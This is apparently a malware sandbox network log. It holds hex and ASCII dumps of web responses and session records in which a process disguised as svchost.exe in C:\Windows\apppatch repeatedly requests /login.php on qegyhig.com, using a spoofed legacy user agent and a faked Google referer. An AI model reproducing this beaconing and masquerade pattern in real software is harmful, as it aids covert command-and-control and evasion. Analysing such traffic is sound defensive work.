                                                                                                                                                                                                          2024-09-08 08:53:22 UTC1369INData Raw: 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 29 3a 6e 6f 74 28 5b 64 69 73 74 61 6e 63 65 5d 29 3a 6e 6f 74 28 5b 61 63 74 69 76 65 5d 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 31 30 30 30 76 68 29 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3e 69 6e 70 75 74 2c 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74
                                                                                                                                                                                                          Data Ascii: er-background{display:none!important}amp-story-page:not(:first-of-type):not([distance]):not([active]){transform:translateY(1000vh)!important}amp-autocomplete{position:relative!important;display:inline-block!important}amp-autocomplete>input,amp-autocomplet
                                                                                                                                                                                                          2024-09-08 08:53:22 UTC1369INData Raw: 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 69 7a 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 69 6e 74 72 69 6e 73 69 63 2d 73 69 7a 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 69 2d 61
                                                                                                                                                                                                          Data Ascii: ][height]:not(.i-amphtml-layout-intrinsic){display:inline-block;position:relative;max-width:100%}.i-amphtml-layout-intrinsic .i-amphtml-sizer{max-width:100%}.i-amphtml-intrinsic-sizer{max-width:100%;display:block!important}.i-amphtml-layout-container,.i-a
                                                                                                                                                                                                          2024-09-08 08:53:22 UTC1369INData Raw: 2d 6c 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 72 69 67 68 74 3a 30 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 72 65 70 6c 61 63 65 64 2d 63 6f 6e 74 65 6e 74 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 65 65 6e 2d 72 65 61 64 65 72 7b 70 61 64 64 69 6e 67 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 65 65 6e 2d 72 65 61 64 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 74 6f 70 3a 30 70 78 21 69 6d 70 6f 72 74 61 6e 74
                                                                                                                                                                                                          Data Ascii: -layout-size-defined .i-amphtml-fill-content{position:absolute;top:0;left:0;bottom:0;right:0}.i-amphtml-replaced-content,.i-amphtml-screen-reader{padding:0!important;border:none!important}.i-amphtml-screen-reader{position:fixed!important;top:0px!important
                                                                                                                                                                                                          2024-09-08 08:53:22 UTC1369INData Raw: 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3e 69 6d 67 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 2c 5b 77 69 64 74 68 5d 5b 68
                                                                                                                                                                                                          Data Ascii: layout]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-amphtml-element)[i-amphtml-ssr]>img.i-amphtml-fill-content{display:block}.i-amphtml-notbuilt:not(.i-amphtml-layout-container),[layout]:not([layout=container]):not(.i-amphtml-element),[width][h
                                                                                                                                                                                                          2024-09-08 08:53:22 UTC1369INData Raw: 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 61 74 74 72 28 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 29 7d 69 2d 61 6d 70 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 2c 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70
                                                                                                                                                                                                          Data Ascii: y{display:none!important}.i-amphtml-element-error{background:red!important;color:#fff!important;position:relative!important}.i-amphtml-element-error:before{content:attr(error-message)}i-amp-scroll-container,i-amphtml-scroll-container{position:absolute;top
                                                                                                                                                                                                          2024-09-08 08:53:22 UTC1369INData Raw: 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 70 78 29 7b 3a 77 68 65 72 65 28 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 3e 73 65 63 74 69 6f 6e 29 3e 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 66 65 66 65 66 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 66 64 66 64 66 7d 3a 77 68 65 72 65 28 61 6d 70 2d 61 63 63 6f 72 64 69
                                                                                                                                                                                                          Data Ascii: ],form [submit-success],form [submitting]{display:none}amp-accordion{display:block!important}@media (min-width:1px){:where(amp-accordion>section)>:first-child{margin:0;background-color:#efefef;padding-right:20px;border:1px solid #dfdfdf}:where(amp-accordi
                                                                                                                                                                                                          2024-09-08 08:53:22 UTC1369INData Raw: 30 2e 6d 6a 73 22 20 74 79 70 65 3d 22 6d 6f 64 75 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 6e 6f 6d 6f 64 75 6c 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 76 30 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 76 30 2f 61 6d 70 2d 62 69 6e 64 2d 30 2e 31 2e 6d 6a 73 22 20 61 73 79 6e 63 3d 22 22 20 63 75 73 74 6f 6d 2d 65 6c 65 6d 65 6e 74 3d 22 61 6d 70 2d 62 69 6e 64 22 20 74 79 70 65 3d 22 6d 6f 64 75
                                                                                                                                                                                                          Data Ascii: 0.mjs" type="module" crossorigin="anonymous"></script><script async nomodule src="https://cdn.ampproject.org/v0.js" crossorigin="anonymous"></script><script src="https://cdn.ampproject.org/v0/amp-bind-0.1.mjs" async="" custom-element="amp-bind" type="modu


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          4192.168.2.957343188.114.96.34431512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-09-08 08:53:54 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-09-08 08:53:55 UTC759INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:55 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y1Tqm34XKyKNkTfHmQXQgrCQLSo9xhcLIhpY4fHRotCBwUO182%2B95GoYFaR6UlGI2z1O6fq8qUNkkUDvfq1PMBf5kNwce5q%2F9UTXqAWlIcaG4mjruW%2BTduDzdBVatA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb5f73a864376-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          2024-09-08 08:53:55 UTC610INData Raw: 37 63 62 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                          Data Ascii: 7cba<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                          2024-09-08 08:53:55 UTC1369INData Raw: 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 71 65 67 79
                                                                                                                                                                                                          Data Ascii: title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://qegy
                                                                                                                                                                                                          2024-09-08 08:53:55 UTC1369INData Raw: 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65 74 75 72 6e 20 74 2e 65 76 65 72 79 28 66 75 6e
                                                                                                                                                                                                          Data Ascii: illText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(fun
                                                                                                                                                                                                          2024-09-08 08:53:55 UTC1369INData Raw: 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 7d 63 61 74 63 68 28 65 29 7b 7d 72
                                                                                                                                                                                                          Data Ascii: !0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}r
                                                                                                                                                                                                          2024-09-08 08:53:55 UTC1369INData Raw: 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 34 2e 33 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 3a 72 6f 6f 74 7b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 78 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 73 6c 67
                                                                                                                                                                                                          Data Ascii: https://qegyhig.com/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.3.1' media='all' /><style id='astra-theme-css-inline-css'>:root{--ast-container-default-xlg-padding:3em;--ast-container-default-lg-padding:3em;--ast-container-default-slg
                                                                                                                                                                                                          2024-09-08 08:53:55 UTC1369INData Raw: 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 7d 68 33 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 7d 68 34 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d
                                                                                                                                                                                                          Data Ascii: :1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-weight:600;line-height:1.25em;}h3,.entry-content h3{font-size:26px;font-size:1.625rem;font-weight:600;line-height:1.2em;}h4,.entry-content h4{font-size:24px;font-size:1.5rem;line-height:1.2em
                                                                                                                                                                                                          2024-09-08 08:53:55 UTC1369INData Raw: 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74 7b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 2a 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 35 3b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 20 2a 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 20 2a 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 3e 20 2e 70 61 67 65 2d 6c 69 6e 6b 2c 2e 70 61 67 65 2d 6c
                                                                                                                                                                                                          Data Ascii: 04;}.single .nav-links .nav-previous,.single .nav-links .nav-next{color:#d10404;}.entry-meta,.entry-meta *{line-height:1.45;color:#d10404;}.entry-meta a:hover,.entry-meta a:hover *,.entry-meta a:focus,.entry-meta a:focus *,.page-links > .page-link,.page-l
                                                                                                                                                                                                          2024-09-08 08:53:55 UTC1369INData Raw: 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 6f 63 5f 5f 77 72 61 70 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 61 78 6f 6d 6f 6e 79 2d 62 6f 78 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 20 3e 20 6c 69 20 3e 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e
                                                                                                                                                                                                          Data Ascii: le-post .entry-content .uagb-timeline a,.ast-single-post .entry-content .uagb-toc__wrap a,.ast-single-post .entry-content .uagb-taxomony-box a,.ast-single-post .entry-content .woocommerce a,.entry-content .wp-block-latest-posts > li > a,.ast-single-post .
                                                                                                                                                                                                          2024-09-08 08:53:55 UTC1369INData Raw: 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 6e 75 6d 62 65 72 22 5d 3a 66 6f 63 75 73 2c 74 65 78 74 61 72 65 61 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 3a 66 6f 63 75 73 2c 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 65 63 74 69 6f 6e 2d 68 65 61 64 65 72 2d 6d 6f 62 69 6c 65 2d 74 72 69 67 67 65 72 22 5d 20
                                                                                                                                                                                                          Data Ascii: cus,input[type="email"]:focus,input[type="url"]:focus,input[type="password"]:focus,input[type="reset"]:focus,input[type="search"]:focus,input[type="number"]:focus,textarea:focus,.wp-block-search__input:focus,[data-section="section-header-mobile-trigger"]


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          5192.168.2.957344188.114.96.34431512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-09-08 08:53:56 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-09-08 08:53:57 UTC755INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:57 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6yxmMiz0GykYnaZPBg3WIoUaAnjjJuMALy1zU5jybloHK0GPi17pSpNIgLmEUWoXVYDC30Z06LEXJNeIC730O98m4tjita1Cm4KdKlYO72txqG%2F4rqXZpcMckmtktA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb6060f4a1895-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
